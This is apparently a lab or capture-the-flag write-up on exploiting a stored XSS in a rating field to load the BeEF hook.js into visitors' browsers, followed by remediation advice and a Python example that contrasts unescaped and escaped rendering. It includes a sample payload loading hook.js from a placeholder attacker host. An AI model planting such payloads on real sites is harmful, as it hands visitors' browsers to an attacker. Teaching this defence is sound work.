Write-up for the BeEF Challenge


The task is to test XSS and BeEF (the Browser Exploitation Framework).


  • The rating text field accepts unescaped input, so script can be injected into the page (stored XSS). We inject a script tag that loads the BeEF hook.js; it is executed in the browser of every victim who views the site.
  • Once hooked, the victim's browser polls the BeEF server, and commands issued from the BeEF console are executed in that browser.

Vulnerability remediation

  • A Content Security Policy (CSP) restricting script sources prevents the victim's browser from loading hook.js from the attacker's host at all. This mitigates exploitation but does not remove the injection vulnerability.
  • A WAF can help to detect such injection attempts (but likewise does not remove the vulnerability).
  • User input must always be escaped / sanitized (HTML entities) before it is rendered, so that it is displayed as text and never executed.
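As an added example (not code from the original write-up), the vulnerable rendering of the rating field beside its escaped form, plus the kind of CSP header the first remediation point refers to; the hook host is a placeholder.

```python
import html

# Constructed sample: a rating comment carrying the BeEF hook, as it would be
# submitted to the unescaped rating field (host is a placeholder, not from the write-up).
HOOKED_RATING = '<script src="http://attacker.example:3000/hook.js"></script>Great!'

# Defence in depth: only scripts from the site's own origin may run, so an
# injected <script src="http://.../hook.js"> is refused by the browser even if
# escaping is missed somewhere. This does NOT fix the injection itself.
CSP_HEADER = "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'"


def render_rating_vulnerable(text: str) -> str:
    """'Before' rendering: user input is concatenated into the page verbatim,
    so a script tag in the rating is parsed and executed by every visitor."""
    return f'<li class="rating">{text}</li>'


def render_rating_safe(text: str) -> str:
    """Hardened rendering: every HTML-significant character (<, >, &, quotes)
    is converted to its entity, so the browser displays the text as-is
    instead of interpreting it as markup."""
    return f'<li class="rating">{html.escape(text, quote=True)}</li>'


def contains_live_script_tag(rendered: str) -> bool:
    """Check: does the rendered fragment still contain a parseable <script> tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print("vulnerable:", render_rating_vulnerable(HOOKED_RATING))
    print("escaped:   ", render_rating_safe(HOOKED_RATING))
    print("header:    ", CSP_HEADER)
```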